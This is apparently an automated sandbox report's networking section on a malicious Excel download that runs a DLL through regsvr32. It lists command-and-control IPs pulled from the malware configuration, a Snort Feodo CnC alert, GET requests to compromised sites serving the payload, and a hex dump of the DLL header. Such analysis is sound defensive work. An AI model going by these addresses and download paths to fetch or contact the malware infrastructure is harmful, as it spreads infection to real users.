Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 135.148.6.80:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 144.91.78.55:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 175.98.167.163:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 118.98.72.14:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 216.219.81.50:80

Networking

barindex
Source: C:\Windows\System32\regsvr32.exe Network Connect: 172.105.226.75 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 138.197.68.35 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 139.162.113.169 8080 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 144.91.78.55 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Network Connect: 135.148.6.80 443 Jump to behavior
Source: Traffic Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49179 -> 139.162.113.169:8080
Source: Malware configuration extractor IPs: 139.162.113.169:8080
Source: Malware configuration extractor IPs: 135.148.6.80:443
Source: Malware configuration extractor IPs: 144.91.78.55:443
Source: Malware configuration extractor IPs: 172.105.226.75:8080
Source: Malware configuration extractor IPs: 51.161.73.194:443
Source: Malware configuration extractor IPs: 41.73.252.195:443
Source: Malware configuration extractor IPs: 82.223.21.224:8080
Source: Malware configuration extractor IPs: 172.104.251.154:8080
Source: Malware configuration extractor IPs: 201.94.166.162:443
Source: Malware configuration extractor IPs: 151.106.112.196:8080
Source: Malware configuration extractor IPs: 185.4.135.165:8080
Source: Malware configuration extractor IPs: 103.132.242.26:8080
Source: Malware configuration extractor IPs: 101.50.0.91:8080
Source: Malware configuration extractor IPs: 51.91.76.89:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 103.43.75.120:443
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 82.165.152.127:8080
Source: Malware configuration extractor IPs: 196.218.30.83:443
Source: Malware configuration extractor IPs: 159.65.140.115:443
Source: Malware configuration extractor IPs: 160.16.142.56:8080
Source: Malware configuration extractor IPs: 107.170.39.149:8080
Source: Malware configuration extractor IPs: 72.15.201.15:8080
Source: Malware configuration extractor IPs: 167.172.253.162:8080
Source: Malware configuration extractor IPs: 209.97.163.214:443
Source: Malware configuration extractor IPs: 134.122.66.193:8080
Source: Malware configuration extractor IPs: 37.187.115.122:8080
Source: Malware configuration extractor IPs: 188.44.20.25:443
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 207.148.79.14:8080
Source: Malware configuration extractor IPs: 183.111.227.137:8080
Source: Malware configuration extractor IPs: 159.89.202.34:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 159.65.88.10:8080
Source: Malware configuration extractor IPs: 51.254.140.238:7080
Source: Malware configuration extractor IPs: 45.235.8.30:8080
Source: Malware configuration extractor IPs: 64.227.100.222:8080
Source: Malware configuration extractor IPs: 186.194.240.217:443
Source: Malware configuration extractor IPs: 149.56.131.28:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 115.68.227.76:8080
Source: Malware configuration extractor IPs: 91.207.28.33:8080
Source: Malware configuration extractor IPs: 79.137.35.198:8080
Source: Malware configuration extractor IPs: 103.70.28.102:8080
Source: Malware configuration extractor IPs: 94.23.45.86:4143
Source: Malware configuration extractor IPs: 209.126.98.206:8080
Source: Malware configuration extractor IPs: 213.241.20.155:443
Source: Malware configuration extractor IPs: 5.9.116.246:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 163.44.196.120:8080
Source: Malware configuration extractor IPs: 206.189.28.199:8080
Source: Malware configuration extractor IPs: 1.234.2.232:8080
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 119.193.124.41:7080
Source: Malware configuration extractor IPs: 146.59.226.45:443
Source: Malware configuration extractor IPs: 150.95.66.124:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.186.16.18:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 153.126.146.25:7080
Source: Malware configuration extractor IPs: 197.242.150.244:8080
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View IP Address: 151.106.112.196 151.106.112.196
Source: Joe Sandbox View IP Address: 110.232.117.186 110.232.117.186
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Jul 2022 05:11:46 GMTServer: Apache/2.4.54 (cPanel) OpenSSL/1.1.1p mod_bwlimited/1.4Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 29 Jul 2022 05:11:46 GMTContent-Disposition: attachment; filename="nQd2n6798wQuOjZR7TtNgQ.dll"Content-Transfer-Encoding: binarySet-Cookie: 62e36c129f7bc=1659071506; expires=Fri, 29-Jul-2022 05:12:46 GMT; Max-Age=60; path=/Last-Modified: Fri, 29 Jul 2022 05:11:46 GMTContent-Length: 721920Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 3b 86 10 70 5a e8 43 70 5a e8 43 70 5a e8 43 a3 28 eb 42 76 5a e8 43 a3 28 ed 42 fa 5a e8 43 12 22 ec 42 7e 5a e8 43 12 22 eb 42 79 5a e8 43 12 22 ed 42 57 5a e8 43 a3 28 ec 42 7b 5a e8 43 a3 28 ef 42 71 5a e8 43 a3 28 e9 42 7b 5a e8 43 70 5a e9 43 19 5a e8 43 f3 23 ed 42 77 5a e8 43 f3 23 e8 42 71 5a e8 43 f3 23 17 43 71 5a e8 43 70 5a 7f 43 71 5a e8 43 f3 23 ea 42 71 5a e8 43 52 69 63 68 70 5a e8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 d4 0b ab 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1f 00 16 05 00 00 ea 05 00 00 00 00 00 dc a3 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0b 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 50 23 07 00 44 02 00 00 94 25 07 00 78 00 00 00 00 c0 07 00 ec 8e 03 00 00 70 07 00 08 3d 00 00 00 00 00 00 00 00 00 00 00 50 0b 00 60 08 00 00 90 e1 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e0 06 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 05 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 15 05 00 00 10 00 00 00 16 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 46 01 02 00 00 30 05 00 00 02 02 00 00 1a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 27 00 00 00 40 07 00 00 0e 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 3d 00 00 00 70 07 00 00 3e 00 00 00 2a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 5c 01 00 00 00 b0 07 00 00 02 00 00 00 68 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$4;pZCpZCpZC(
Source: global traffic HTTP traffic detected: GET /PHPExcel/sQ78BedribNJZbGYj/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.careofu.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SDM/qNeMUe2RvxdvuRlf/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fikti.bem.gunadarma.ac.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/Gu0xno0kIssGJF8/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: balticcontrolbd.comConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 139.162.113.169:8080
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 138.197.68.35:8080
Source: unknown Network traffic detected: IP country count 28
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Jul 2022 05:07:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Security-Policy: upgrade-insecure-requestsSet-Cookie: PHPSESSID=1l563d6slg0f1tusr2j6oh3g31; path=/
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 135.148.6.80
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 139.162.113.169
Source: unknown TCP traffic detected without corresponding DNS query: 144.91.78.55
Source: unknown TCP traffic detected without corresponding DNS query: 172.105.226.75
Source: unknown TCP traffic detected without corresponding DNS query: 172.105.226.75
Source: unknown TCP traffic detected without corresponding DNS query: 172.105.226.75
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000008.00000002.1758552443.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1652975385.0000000000277000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758208107.0000000000277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000008.00000003.1533250954.000000000041E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1758252349.000000000041E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1652983458.000000000027E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758214783.000000000027E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000008.00000003.1530030286.0000000003427000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.8.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000A.00000002.1758450219.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 00000008.00000002.1758462454.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme19R
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000008.00000002.1758689094.0000000003427000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://135.148.6.80/
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://135.148.6.80/_:
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://138.197.68.35/080/Y
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://138.197.68.35/viderU
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://138.197.68.35:8080/
Source: regsvr32.exe, 00000008.00000002.1758301087.0000000000455000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169/
Source: regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169/ctiv
Source: regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169/f
Source: regsvr32.exe, 00000008.00000003.1533281037.000000000043A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169:8080/
Source: regsvr32.exe, 00000008.00000002.1758295098.000000000044D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533295116.000000000044D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169:8080/R
Source: regsvr32.exe, 00000008.00000002.1758295098.000000000044D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533295116.000000000044D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.162.113.169:8080/U
Source: regsvr32.exe, 00000008.00000002.1758689094.0000000003427000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758141495.000000000021A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://144.91.78.55/
Source: regsvr32.exe, 0000000A.00000002.1758141495.000000000021A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://144.91.78.55/o
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://172.105.226.75/
Source: regsvr32.exe, 00000008.00000002.1758689094.0000000003427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://172.105.226.75/=
Source: regsvr32.exe, 00000008.00000002.1758689094.0000000003427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://172.105.226.75/A
Source: regsvr32.exe, 0000000A.00000002.1758515260.0000000002D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://172.105.226.75:8080/
Source: regsvr32.exe, 00000008.00000002.1758552443.0000000002D76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://172.105.226.75:8080/Z
Source: regsvr32.exe, 00000008.00000002.1758508726.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758247391.00000000002A3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1758474108.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1653019925.00000000002A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nQd2n6798wQuOjZR7TtNgQ[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: www.careofu.com
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016628 InternetReadFile, 8_2_0000000180016628
